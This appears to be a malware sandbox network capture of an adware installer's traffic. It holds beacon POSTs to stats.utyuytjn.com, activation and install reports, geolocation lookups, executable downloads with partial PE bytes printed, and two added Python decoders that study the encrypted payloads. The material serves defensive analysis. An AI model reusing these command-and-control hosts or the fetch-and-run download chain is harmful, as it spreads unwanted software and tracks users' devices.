2822304323112919010107711002711117025007110610709420608505023719314805
6004057081120213032078203009192226127096078213170137216113245024082212
0270131892050771802230950650180580250851240550710692531181592520092041
2621015112821914913821420806518918710110200601503507601913715603116609
2114175086103122168000186223125169130130084243234205117131184254149193
0620631040590230872540872520021982011011720091832440870072282200260892
3112919525100915715414007707507900211701007805400605623614004118814424
5239058107230142034041175152025016083043162229236081023110199073012084
1602112181390760260951781280481900732181591491341531112320050362111031
1720815717717320305321702722824604316418803401015205217117505207103723
0105028139109014077232089047197175046149232191255141170032146009003243
2370190441530320470181780350301052220870030770662252062160341241052121
2506817017825207203322122510509118119024424012113503113820417220509821
3031226117166109229065243146106161105205024082030099010051158141252184
2211150811761721822061421681961821101751891961972101791341720972381551
03093059141220093051251213010051108009116103"}


HTTP/1.1 200 OK

Cache-Control: private
Content-Length: 10
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 Oct 2017 10:13:47 GMT
{"d":"OK"}....



POST /StatisticsService.svc/V1/JSON/Lee HTTP/1.1

Content-Type: application/json; charset=utf-8
dataType: json
Host: stats.utyuytjn.com
Content-Length: 1166
Expect: 100-continue


HTTP/1.1 100 Continue
....



{"request":"0631462230990081771352540191321201192020260030102222210091
2822304323112919010107711002711117025007110610709420608505023719314805
6004057081120213032078203009192226127096078213170137216113245024082212
0270131892050771802230950650180580250851240550710692531181592520092041
2621015112821914913821420806518918710110200601503507601913715603116609
2114175086103122168000186223125169130130084243234205117131184254149193
0620631040590230872540872520021982011011720091832440870072282200260892
3112919525100915715414007707507900211701007805400605623614004118814424
5239058107230142034041175152025016083043162229236081023110199073012084
1602112181390760260951781280481900732181591491341531112320050362111031
1720815717717320305321702722824604316418803401015205217117505207103723
0105028139109014077232089047197175046149232191255141170032146009003243
2370190441530320470181780350301052220870030770662252062160341241052121
2506817017825207203322122510509118119024424012113503113820417220509821
3031226117166109229065243146106161105205024082030099010051158141252184
2211150811761721822022402100761990402061180721390121811970231872301051
32220143099214029176146147105084075023055100"}


HTTP/1.1 200 OK

Cache-Control: private
Content-Length: 10
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 Oct 2017 10:13:47 GMT
{"d":"OK"}....



POST /StatisticsService.svc/V1/JSON/Lee HTTP/1.1

Content-Type: application/json; charset=utf-8
dataType: json
Host: stats.utyuytjn.com
Content-Length: 1214
Expect: 100-continue


HTTP/1.1 100 Continue
....



{"request":"0631462230990081771352540191321201192020260030102222210091
2822304323112919010107711002711117025007110610709420608505023719314805
6004057081120213032078203009192226127096078213170137216113245024168166
2411110850621421692501911820581791812330840220872040150182351531891501
5008202407420100800515309920112522506303102112510118308912319915316106
2011023027211251096191061178155250184180226010017102182102116005017175
1911971282461480890750852150890622090721540482290541170341561612111361
1714104919020117615407103701921406515218104112819618814117200222717004
8142029114127104156123248020052011200199001069235096243135216162206224
1162521282361150611401402410040661670572532291600011621110330570450901
0207003409308803110105706710417419121622011318414620311200216012507807
9095014086060034135209042114147025042190113008017247187142139032168227
1192300800721970000670620600430052070841090940421912201670951430821090
2923109201123106816309225206206603708411615312211809313918111718224317
6161002062179117013101040243222063027105029111210000050166103179069244
1980910551620880472240850411520320032051021550420492381692070191601980
5910400620900115601712001813717703605311112703616311504316125302916302
2152074070192238099001"}


HTTP/1.1 200 OK

Cache-Control: private
Content-Length: 10
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 Oct 2017 10:13:47 GMT
{"d":"OK"}....



POST /StatisticsService.svc/V1/JSON/Lee HTTP/1.1

Content-Type: application/json; charset=utf-8
dataType: json
Host: stats.utyuytjn.com
Content-Length: 1982
Expect: 100-continue


HTTP/1.1 100 Continue
....



{"request":"0631462230990081771352540191321201192020260030102222210091
2822304323112919010107711002711117025007110610709420608505023719314805
6004057081120213032078203009192226127096078213170137216113245024010060
0221951810580121350710352371522531262522151410960831490391820320021451
7410816104106415719921613523123402000004810822308209414112608702619618
7167133214067175096186179007048016017195097115089063047142253191197152
1142381870010691990170711902190490190390670260990672170532391542011270
0411417214506412913908324515622325423604311615321618114617506425008003
9222225073247106191208144048101057038136180193084204007152122054047236
0672541161080911742042490781960030370480021742202202140370180501542142
1615701818915402414322016710618920820302415421713325406123413300312708
6226188033132164161088149231216067240023115015024147000196180171068253
0610721830491050460520540780811251842362361720621690130242271290820292
1719114900121920413422604414522019923704818325419903816804812606220200
2226170066185119027191094240222069112172136133238106245085241109169106
0290311720990671091502022281950302261541731641532430881731590902080382
3218500607107605205213519201510514203009504719610610616909819222115504
3190040159216023067217118088005031079128149122062102227254064199018156
0111341101330450781771751040201201840250522552231161000750420110981930
6110205321403202802416124810811522020317009224909921306621907106317021
5173227045034234151069043007059074143079080165074184219153003151144202
042189228236219056120254185070214188128069231153078059035024141068

<<< skipped >>>
HTTP/1.1 200 OK

Cache-Control: private
Content-Length: 10
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 Oct 2017 10:13:47 GMT
{"d":"OK"}....



POST /StatisticsService.svc/V1/JSON/Lee HTTP/1.1

Content-Type: application/json; charset=utf-8
dataType: json
Host: stats.utyuytjn.com
Content-Length: 1214
Expect: 100-continue


HTTP/1.1 100 Continue
....



{"request":"0631462230990081771352540191321201192020260030102222210091
2822304323112919010107711002711117025007110610709420608505023719314805
6004057081120213032078203009192226127096078213170137216113245024168166
2411110850621421692501911820581791812330842170891601450782110120341760
2918904420117716819724221922502209210313221708313919420706907904720206
4163077219044084217023205096058050149181176096250030058116183132122216
0870560311550060540190340422232121680942091561251941890551640050011721
9217523611113225520108619505117419108705707517018421506202817118414522
8248156170048022033170242189125219206079134078050022065150054040186231
1231341000970680520872250650582030061962331920321252231452291290630132
3115616301800206416913603000703901614806811519721104800721921710103719
5121036056172062058001035052204242162244120115034036223154020079198048
1571481721142392360001860361500990031180451770680542412390131510352460
3025210816324824820700223508325321210720118718104206818610909822709401
8111065065117151221008218171037241217140239075160081125254053240089043
0141082531100110070512501860152510920771910821861731332522061491412440
3202817300609412010116521710617810801612613323001310807913412313411305
6218176031066189021095"}


HTTP/1.1 200 OK

Cache-Control: private
Content-Length: 10
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 Oct 2017 10:13:47 GMT
{"d":"OK"}..


GET /iplookup/iplookup.php HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: int.dpool.sina.com.cn


HTTP/1.1 200 OK
Server: Sina
Date: Mon, 09 Oct 2017 10:14:07 GMT
Content-Type: text/html; charset=gbk
Content-Length: 20
Connection: close
DPOOL_HEADER: tyr106
Set-Cookie: INTDPOOL=cb85cb75f7eb9cc5f37b34f3a3b7fb7e;Path=/
DPOOL_LB7_HEADER: apollo219
1.-1.-1...............


GET /jihuo.aspx?NUQ0Q0RDNzlDNUFCQjQ2Njc2QTg5M0JCNUNEODRCQzFFMDNDNkEwOTU2Njk4RjhCOEMyRjk5MTJFOTA4Rjk1RERBMDNBNzQ2REI4RUVEOTlEMDk0MTE5NjQyNTZCREVERTc1ODgxQjlDRTUxNUQwMDRERjFFOUUxQzQ5OURENEQ1RkUyNkFGOTQ2Nzg1OEU4NUU4QTJCN0U5RjhFQkU5NUZCODFGMEMxODUwNTc4OERDRjc1OEY0RjVDRDNCOUZF HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: jk.yeawindows.com


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 Oct 2017 10:15:03 GMT
Connection: close
Content-Length: 0


POST /temptrack/Store HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 360devtraking.website
Content-Length: 224
Expect: 100-continue
Accept-Encoding: gzip


HTTP/1.1 100 Continue
....



order="/LsQENRBY8s/42Z7hB2hIbbJOrFHSz783Guu2YFsHqiQOTI/JyucIhVmFrb nx/
WkOVlt4iJXdyEREdrpXH9pdwqqyQfmQwgR/TgFYZ0Tmv6PxtnhIkVSq FiIdKzqqyuhpqT
ZXd3lq0qNT3U9XB2ssTdiUTjctIaoqD4s9D98EbsB2ufZ 5Rp9VKntv XUpAVc5LdhXh0q
VrPw0bakX5g=="


HTTP/1.1 200 OK

Server: nginx/1.10.1 (Ubuntu)
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Cache-Control: no-cache
X-RateLimit-Limit: 60
X-RateLimit-Remaining: 59
Date: Mon, 09 Oct 2017 10:14:07 GMT
Content-Encoding: gzip
14........................0..


GET /reportInstallaa.aspx?NUQ0Q0RDNzlDNUFCQjQ2Njc2QTg5M0JCNUNEODRCQzFFMDNDNkEwOTU2Njk4RjhCOEMyRjk5MTJFOTA4Rjk1REJCQjlERkJGRUYzNkI1NDY5RkNEMDk4REFFNTZBQUNCRjFBMEEwMkZCMDhFRDBBN0IwRDZBRjc5MkJBRTE0QjM2QkNDMjBEMDI5NEQyMUM3Q0Y5RUM0RUQ1QTYzMEJGQUFGMUE3NEJCQTFFMDIzMjJBRTIxMEY1MUI3MjRGRDIxMTNCNDE1Nzc5ODUzQ0UyQ0Q4MUI3NkYyQ0Y5NjVEQkM= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: jk.yeawindows.com


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 Oct 2017 10:14:59 GMT
Connection: close
Content-Length: 0


GET /jihuo.aspx?NUQ0Q0RDNzlDNUFCQjQ2Njc2QTg5M0JCNUNEODRCQzFFMDNDNkEwOTU2Njk4RjhCOEMyRjk5MTJFOTA4Rjk1RERBMDNBNzQ2REI4RUVEOTlEMDk0MTE5NjQyNTZCREVERTc1ODgxQjlDRTUxNUQwMDRERjFFOUUxQzQ5OURENERGMjAwNDUyODA2NThCRjhGNDUyOTVCRTNCNUY1MDk3QTFBMEJEMDIyNDZFNkIxQTgxMDdENTg1REQ4RDZCOTFC HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: jk.yeawindows.com


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 Oct 2017 10:15:04 GMT
Connection: close
Content-Length: 0


GET /anzhuang.aspx?NUQ0Q0RDNzlDNUFCQjQ2Njc2QTg5M0JCNUNEODRCQzFFMDNDNkEwOTU2Njk4RjhCOEMyRjk5MTJFOTA4Rjk1REMzMEMyQUY0ODJBOUQ3MTg2MURCQTk3RDAwMkEyRTM4OTNGRDEzMDE5MzU0OTQyMjlDMDhBMzMxNzVDNDE3RUY= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: jk.yeawindows.com


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 Oct 2017 10:15:01 GMT
Connection: close
Content-Length: 0
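
The three jk.yeawindows.com endpoints above carry their data in the query string: /jihuo.aspx (pinyin jihuo, 激活, "activate"), /anzhuang.aspx (anzhuang, 安装, "install") and /reportInstallaa.aspx. The query is ordinary base64; decoding it gives an upper-case hex string, and that hex gives a byte string whose length is a multiple of 16. All four queries share their first 32 bytes, and the two /jihuo.aspx queries share their first 64 bytes, with the divergence falling exactly on a 16-byte boundary. That pattern is consistent with a 16-byte block cipher in ECB mode, or in CBC with a static IV, over plaintexts that begin with the same fields; the report does not identify a cipher or key, so treat it as an inference. Note also the malformed header on every one of these requests: the User-Agent value itself begins with "User-Agent: ", which is a usable network signature. The script below is an added example written for this description, not code from the sample or from Lavasoft; the four query strings are copied verbatim from the requests above, and the 16-byte block size is an assumption.

```python
"""Decode the jk.yeawindows.com query strings (base64 over upper-case hex over an
opaque 16-byte-aligned blob) and compare them block by block.

Added example for this description, not code from the sample or from Lavasoft.
The four query strings are copied verbatim from the GET requests in the capture.
BLOCK = 16 is an assumption drawn from the decoded lengths; the report names no cipher.
"""
import base64
import binascii

BLOCK = 16  # assumed block size, inferred from the decoded lengths below

# Verbatim query strings from the capture (endpoint -> query).
QUERIES = {
    "jihuo#1": "NUQ0Q0RDNzlDNUFCQjQ2Njc2QTg5M0JCNUNEODRCQzFFMDNDNkEwOTU2Njk4RjhCOEMyRjk5MTJFOTA4Rjk1RERBMDNBNzQ2REI4RUVEOTlEMDk0MTE5NjQyNTZCREVERTc1ODgxQjlDRTUxNUQwMDRERjFFOUUxQzQ5OURENEQ1RkUyNkFGOTQ2Nzg1OEU4NUU4QTJCN0U5RjhFQkU5NUZCODFGMEMxODUwNTc4OERDRjc1OEY0RjVDRDNCOUZF",
    "reportInstallaa": "NUQ0Q0RDNzlDNUFCQjQ2Njc2QTg5M0JCNUNEODRCQzFFMDNDNkEwOTU2Njk4RjhCOEMyRjk5MTJFOTA4Rjk1REJCQjlERkJGRUYzNkI1NDY5RkNEMDk4REFFNTZBQUNCRjFBMEEwMkZCMDhFRDBBN0IwRDZBRjc5MkJBRTE0QjM2QkNDMjBEMDI5NEQyMUM3Q0Y5RUM0RUQ1QTYzMEJGQUFGMUE3NEJCQTFFMDIzMjJBRTIxMEY1MUI3MjRGRDIxMTNCNDE1Nzc5ODUzQ0UyQ0Q4MUI3NkYyQ0Y5NjVEQkM=",
    "jihuo#2": "NUQ0Q0RDNzlDNUFCQjQ2Njc2QTg5M0JCNUNEODRCQzFFMDNDNkEwOTU2Njk4RjhCOEMyRjk5MTJFOTA4Rjk1RERBMDNBNzQ2REI4RUVEOTlEMDk0MTE5NjQyNTZCREVERTc1ODgxQjlDRTUxNUQwMDRERjFFOUUxQzQ5OURENERGMjAwNDUyODA2NThCRjhGNDUyOTVCRTNCNUY1MDk3QTFBMEJEMDIyNDZFNkIxQTgxMDdENTg1REQ4RDZCOTFC",
    "anzhuang": "NUQ0Q0RDNzlDNUFCQjQ2Njc2QTg5M0JCNUNEODRCQzFFMDNDNkEwOTU2Njk4RjhCOEMyRjk5MTJFOTA4Rjk1REMzMEMyQUY0ODJBOUQ3MTg2MURCQTk3RDAwMkEyRTM4OTNGRDEzMDE5MzU0OTQyMjlDMDhBMzMxNzVDNDE3RUY=",
}


def decode_query(query: str) -> bytes:
    """Peel the two text layers: base64 -> upper-case hex -> raw bytes.
    validate=True rejects stray characters; the hex check makes a wrong guess
    about the inner layer fail loudly instead of returning garbage."""
    inner = base64.b64decode(query, validate=True).decode("ascii")
    if not inner or inner.strip("0123456789ABCDEF"):
        raise ValueError("inner layer is not upper-case hex")
    return binascii.unhexlify(inner)


def shared_prefix_blocks(blobs, block=BLOCK) -> int:
    """Number of leading whole blocks that are identical across all blobs.
    A shared prefix that ends exactly on a block boundary is the tell for ECB,
    or for CBC with a fixed IV, over plaintexts with a common header."""
    limit = min(len(b) for b in blobs) // block
    for i in range(limit):
        lo, hi = i * block, (i + 1) * block
        if any(b[lo:hi] != blobs[0][lo:hi] for b in blobs[1:]):
            return i
    return limit


def analyse(queries=QUERIES) -> dict:
    """Decode every query and summarise lengths and shared leading blocks."""
    blobs = {name: decode_query(q) for name, q in queries.items()}
    return {
        "lengths": {name: len(b) for name, b in blobs.items()},
        "all_block_aligned": all(len(b) % BLOCK == 0 for b in blobs.values()),
        "blocks_shared_by_all": shared_prefix_blocks(list(blobs.values())),
        "blocks_shared_by_jihuo_pair": shared_prefix_blocks(
            [blobs["jihuo#1"], blobs["jihuo#2"]]),
        "leading_hex": blobs["jihuo#1"][:9].hex().upper(),
    }


if __name__ == "__main__":
    for key, value in analyse().items():
        print(f"{key}: {value}")
```

Run stand-alone it prints the four decoded lengths (96, 112, 96 and 64 bytes), confirms they are all block-aligned, and reports 2 blocks shared by all four queries and 4 blocks shared by the /jihuo.aspx pair. The same decode_query() can be pointed at any further query captured from this host; if the inner layer ever stops being upper-case hex the function raises rather than guessing.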


GET /apdata/installers/auto/exe/girafe.exe HTTP/1.1
Host: cdn.piytrwd.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Mon, 09 Oct 2017 10:13:33 GMT
Keep-Alive: timeout=10
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: 1507541783
Cache-Control: max-age=86400
Content-Length: 2729472
Content-Type: application/octet-stream
X-HW: 1507544013.dop015.am4.t,1507544013.cds001.am4.c
Last-Modified: Mon, 09 Oct 2017 09:36:23 GMT
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........Y0GT8^.T8^.
T8^.Yj..*8^.Yj..q8^.Yj...8^.]@..Q8^.T8_..8^.....P8^.Yj..U8^.T8..U8^...
..U8^.RichT8^.........PE..L....B.Y.....................L......bY......
......@...........................*...........@.......................
..............<....P...5....................)..e......8............
...................@............................................text..
..~.......................... ..`.rdata...Q.......R..................@
..@.data....\.......4..................@....rsrc....5...P...6.........
.........@..@.reloc...e....)..f...@).............@..B.................
......................................................................
......................................................................
......................................................................
......................................................................
................................................;...h..K...5..Y.......
..........b8M..............;M..V...h..K...5..Y.............;M......h..
K...5..Y.............;M..v...h..K...5..Y.............;M..F...h..K..b5.
.Y...........j...;M..........j...;M..........j...;M..........j...;M...
.....`2M......h..K...5..Y.h..K...4..Y.h..K...4..Y.h..K...4..Y..l3M....
..h..K...4..Y.h.4M........$..K...4..Y.h..K...4..Y........@..4M...iG...
.5M.....5M.........5M.........5M.........5M......hx5M.....K...........
.....;.s.j.....K.3...................U.....S.].VW...M..33..K..}..M

<<< skipped >>>

GET /Update/CheckInstallConfig?deviceid=3815defc-8d53-7691-634e-7d5250b86812&distributer=APSnapdoAMRev&channelid=3&barcodeid=50027003&country=UA&encrypt=True HTTP/1.1
Host: updates.utyuytjn.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: public, max-age=60
Content-Type: application/json; charset=utf-8
Expires: Mon, 09 Oct 2017 10:14:45 GMT
Last-Modified: Mon, 09 Oct 2017 10:13:45 GMT
Vary: *
Server: Microsoft-IIS/8.5
X-AspNetMvc-Version: 5.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 Oct 2017 10:13:45 GMT
Content-Length: 278
[{"Distributer":"APSnapdoAMRev","ChannelID":"*","BarcodeID":"*","Count
ry":"*","Type":"InstallConfig","Version":"1.0.0.0","Name":"","Url":"ht
tp://cdn.ijnewhb.com/apdata/installers/installer/installers-config/sna
pdo-ap/apsnapdoamrev/ic170817.xml","ApName":"Ronzap","RangeStr":""}]


GET /apdata/installers/installer/installers-config/snapdo-ap/apsnapdoamrev/ic170817.xml HTTP/1.1
Host: cdn.ijnewhb.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: no-cache
Content-MD5: usysLlirjb9CcsmmYlN5Zw==
Content-Type: text/text
Date: Mon, 09 Oct 2017 10:13:46 GMT
Etag: 0x8D4E5515B4714EF
Last-Modified: Thu, 17 Aug 2017 09:21:35 GMT
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-blob-type: BlockBlob
x-ms-lease-status: unlocked
x-ms-request-id: bb90ae92-001e-0028-58e7-40b7d3000000
x-ms-version: 2009-09-19
Content-Length: 18912
0451172170521482400972540131681420280440702401300140371510261340590491
6705814003723022417509508516823313924109622002600009123912205202619515
0122048224212188161077052176172155067108191251021214178213193203148184
1372420651410160011131292230850851460481940851112401241961270611720460
1702401707211306019500414715515212921920804307522321716206620914614618
7251022064177129160206027116067223162200188025065009028216061177170133
1782242170821171530892301900050270161640630710812180342440500511990800
8218611508012420922203210514101119913900401507615719304918405113212206
1019129173226182194144155199255201218059039035075177136214036192039044
2241080342272051060591152321270951941210701491461361162440091731261620
1913823019121603024824521912313222601613424211224012008911806300423408
6212249061050170094162099177069070037008039081187095080151101197117084
1701750630921611731462391080550260941090670471162402231501270261820721
9417225224523100412804221118017921018722222424209719907212101003903500
4055242070216025238182004062253117241192160116034153215029181191038067
1660120910910212152261632141451370180070841190600161731071242470230771
4617024713802307415719507524523214405703306919203702103101110410512712
6003090054067046170143142060034217142115216193239120047056250028038116
1762200932090021850090342030450930940530421021151960850140871160121920
6517514304508017806425115320211713520411703914806619321714416914214914
5163149133078097178212200098029149154122138242212017193129205077067116
103201207076235152204213059081092044118223170223190043155018138118

<<< skipped >>>
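
The POST bodies sent to stats.utyuytjn.com and the ic170817.xml body served from cdn.ijnewhb.com use the same encoding: a run of zero-padded three-digit decimal numbers in the range 000-255, one per byte (the POSTs wrap the run as {"request":"..."}, the XML response is the bare run). The Content-Length values above give byte counts of 800, 1296, 448, 464, 384, 384, 400, 656 and 400 for the nine POSTs and 6304 for the XML file, every one a multiple of 16, and every POST body shares at least its first 64 bytes with the others before diverging on a 16-byte boundary. As with the jk.yeawindows.com query strings, that is consistent with a 16-byte block cipher in ECB or static-IV CBC over plaintexts that share a fixed header; the report identifies neither cipher nor key, so it stays an inference. The decoder below is an added example for this description, not code from the sample or from Lavasoft; the two 198-digit fragments and the Content-Length values are copied from the capture above, and the 16-byte block size is an assumption.

```python
"""Decode the zero-padded decimal-triplet blobs seen in the stats.utyuytjn.com POST
bodies and in the ic170817.xml response, and check their block structure.

Added example for this description, not code from the sample or from Lavasoft.
REQ_A / REQ_B are the first 198 digits of two POST bodies and the Content-Length
lists are taken from the capture; BLOCK = 16 is an inference, not a stated fact.
"""
import json

BLOCK = 16  # assumed block size (AES-sized), inferred from the lengths below

# First three text lines (198 digits = 66 bytes) of two different POST bodies.
REQ_A = (
    "0631462230990081771352540191321201192020260030102222210091"
    "2822304323112919010107711002711117025007110610709420608505023719314805"
    "6004057081120213032078203009192226127096078213170137216113245024218195"
)
REQ_B = (
    "0631462230990081771352540191321201192020260030102222210091"
    "2822304323112919010107711002711117025007110610709420608505023719314805"
    "6004057081120213032078203009192226127096078213170137216113245024007218"
)

# Content-Length of each POST /StatisticsService.svc/V1/JSON/Lee in the capture,
# and of the GET .../ic170817.xml response (a bare triplet string, no wrapper).
POST_CONTENT_LENGTHS = [2414, 3902, 1358, 1406, 1166, 1166, 1214, 1982, 1214]
XML_CONTENT_LENGTH = 18912
JSON_WRAPPER = len('{"request":"') + len('"}')  # 14 bytes around the digits


def unwrap_post_body(body: str) -> str:
    """Pull the digit run out of the {"request":"..."} wrapper used by the POSTs."""
    return json.loads(body)["request"]


def triplets_to_bytes(digits: str) -> bytes:
    """'063146223' -> b'\\x3f\\x92\\xdf'. A length that is not a multiple of 3, or
    a value above 255, means the dump is truncated or mis-aligned; fail loudly."""
    if len(digits) % 3:
        raise ValueError(f"{len(digits)} digits is not a whole number of triplets")
    values = [int(digits[i:i + 3]) for i in range(0, len(digits), 3)]
    if any(v > 255 for v in values):
        raise ValueError("triplet above 255: not a byte string at this alignment")
    return bytes(values)


def payload_bytes(content_length: int, wrapped: bool) -> int:
    """Blob size in bytes implied by an HTTP Content-Length, after removing the
    JSON wrapper for the POST bodies (the XML response has none)."""
    digits = content_length - (JSON_WRAPPER if wrapped else 0)
    if digits % 3:
        raise ValueError("Content-Length does not fit a triplet string")
    return digits // 3


def first_differing_block(a: bytes, b: bytes, block: int = BLOCK) -> int:
    """Index of the first block where two blobs differ, or -1 if neither differs
    within their common length. Divergence on a block boundary after a shared
    prefix is the ECB / static-IV-CBC tell."""
    for i in range(0, min(len(a), len(b)), block):
        if a[i:i + block] != b[i:i + block]:
            return i // block
    return -1


def blob_sizes() -> list:
    """Every blob size in the capture, in bytes; all are multiples of 16."""
    sizes = [payload_bytes(cl, wrapped=True) for cl in POST_CONTENT_LENGTHS]
    sizes.append(payload_bytes(XML_CONTENT_LENGTH, wrapped=False))
    return sizes


if __name__ == "__main__":
    a = triplets_to_bytes(unwrap_post_body('{"request":"%s"}' % REQ_A))
    b = triplets_to_bytes(REQ_B)
    print("blobs diverge at block", first_differing_block(a, b))
    print("blob sizes:", blob_sizes())
    print("all multiples of 16:", all(s % BLOCK == 0 for s in blob_sizes()))
```

On the two fragments above the blobs agree for blocks 0 to 3 and diverge at block 4, which is why the sizes and the shared prefixes are worth recording alongside the usual host and URL indicators: any later sample that talks to the same endpoints can be checked against the same two properties without knowing the key.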

GET /MaxMind.asmx/GetGeoInfo HTTP/1.1
Host: madmax.utyuytjn.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 Oct 2017 10:13:44 GMT
Content-Length: 184
<?xml version="1.0" encoding="utf-8"?>
<string xmlns="http://temptempuri.org/">194.242.96.218,UA,Ukraine,07,Kharkiv,,49.9808044433594,36.2527008056641,0,0,Kharkivs'ka Oblast'</string>


GET /enjoyWiFi/enjoyWIFI.exe HTTP/1.1
Host: yeawindows.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Mon, 09 Oct 2017 04:38:57 GMT
Accept-Ranges: bytes
ETag: "4dca5e85b840d31:0"
Server: Microsoft-IIS/7.5
Date: Mon, 09 Oct 2017 10:13:38 GMT
Content-Length: 1881569
MZP.....................@.............................................
..!..L.!..This program must be run under Win32..$7....................
......................................................................
..............................................PE..L....^B*............
.........F....................@..........................@............
.......@..............................P........,......................
......................................................................
..............CODE....8........................... ..`DATA....L.......
....................@...BSS.....P................................idata
..P...........................@....tls................................
.....rdata..............................@..P.reloc....................
..........@..P.rsrc....,.......,..................@..P.............@..
....................@..P..............................................
......................................................................
..............................................string................<
.@.....m.@..........)@..(@..(@..(@......(@..Free...)@..InitInstance.
. )@..CleanupInstance..<(@..ClassType..@(@..ClassName..T(@..ClassNa
meIs..|(@..ClassParent...)@..ClassInfo...(@..InstanceSize...)@..Inheri
tsFrom...)@..Dispatch...)@..MethodAddress...*@..MethodName..L*@..Field
Address...)@..DefaultHandler...(@..NewInstance...(@..FreeInstance.TObj
ect.@...@..% .@....%..@....%..@....%..@....%..@....%..@....%..@....%(.
@....%..@....%..@....%..@....%..@....%..@....%..@....%..@....%..@.

<<< skipped >>>

GET /enjoyWiFi/enjoyWIFI.exe HTTP/1.1

Host: yeawindows.com


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Mon, 09 Oct 2017 04:38:57 GMT
Accept-Ranges: bytes
ETag: "4dca5e85b840d31:0"
Server: Microsoft-IIS/7.5
Date: Mon, 09 Oct 2017 10:14:05 GMT
Content-Length: 1881569
MZP.....................@.............................................
..!..L.!..This program must be run under Win32..$7....................
......................................................................
..............................................PE..L....^B*............
.........F....................@..........................@............
.......@..............................P........,......................
......................................................................
..............CODE....8........................... ..`DATA....L.......
....................@...BSS.....P................................idata
..P...........................@....tls................................
.....rdata..............................@..P.reloc....................
..........@..P.rsrc....,.......,..................@..P.............@..
....................@..P..............................................
......................................................................
..............................................string................<
.@.....m.@..........)@..(@..(@..(@......(@..Free...)@..InitInstance.
. )@..CleanupInstance..<(@..ClassType..@(@..ClassName..T(@..ClassNa
meIs..|(@..ClassParent...)@..ClassInfo...(@..InstanceSize...)@..Inheri
tsFrom...)@..Dispatch...)@..MethodAddress...*@..MethodName..L*@..Field
Address...)@..DefaultHandler...(@..NewInstance...(@..FreeInstance.TObj
ect.@...@..% .@....%..@....%..@....%..@....%..@....%..@....%..@....%(.
@....%..@....%..@....%..@....%..@....%..@....%..@....%..@....%..@.

<<< skipped >>>

GET /download/APSnapdoAMRev HTTP/1.1
Host: install.rgbcjfir.com
Connection: Keep-Alive


HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: hXXp://cdn.piytrwd.com/apdata/installers/auto/exe/girafe.exe
Server: Microsoft-IIS/8.5
X-AspNetMvc-Version: 5.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 Oct 2017 10:13:32 GMT
Content-Length: 177
<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="hXXp://cdn.piytrwd.com/apdata/installers/auto/exe/girafe.exe">here</a>.</h2>
</body></html>


GET /black/mirenda/3/default/UA.xml HTTP/1.1
Host: room1.360dev.info
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Mon, 09 Oct 2017 10:13:32 GMT
Content-Type: text/xml; charset=utf-8
Content-Length: 181848
Last-Modified: Mon, 09 Oct 2017 10:00:03 GMT
Connection: keep-alive
ETag: "59db48a3-2c658"
Accept-Ranges: bytes

<<< skipped >>>

